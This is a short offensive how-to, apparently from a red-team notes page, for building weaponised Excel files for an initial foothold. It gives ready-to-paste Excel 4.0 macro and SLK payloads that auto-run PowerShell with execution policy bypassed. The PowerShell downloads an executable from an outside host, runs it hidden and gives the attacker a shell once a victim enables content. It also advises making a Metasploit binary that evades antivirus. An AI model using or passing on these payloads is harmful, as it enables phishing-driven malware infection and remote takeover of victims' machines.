Microsoft Excel Payload

Microsoft Excel Payload for initial foothold is old method but still widely used by APTs.

Microsoft Excel 4.0 Macro Payload

Right click on the workbook and click insert

Select MS Excel 4.0 Macro

paste following payload:

=EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe")
=WAIT(NOW()+"00:00:10")
=EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe")
=HALT()

Now Select first cell and rename it to Auto_Open

Save as Excel 97-2003 Workbook(XLS)

When victim Enable Content We get shell

Microsoft Excel SLK Payload

Generate binary using metasploit. Make sure make it bypass AV.

Open Notepad and paste:

ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.88.168:8000/20.exe -outfile c:\users\public\20.exe")
C;X1;Y102;K0;EWAIT(NOW()+"00:00:10")
C;X1;Y103;K0;EEXEC("powershell.exe c:\users\public\20.exe")
C;X1;Y104;K0;EHALT()
E

And Save ask Test.slk

When victim double click and Enable Content It downloads the binary and execute, as a result we get shell

Microsoft Excel 4.0 Macro Payload#

Microsoft Excel SLK Payload#

Microsoft Excel 4.0 Macro Payload

Microsoft Excel SLK Payload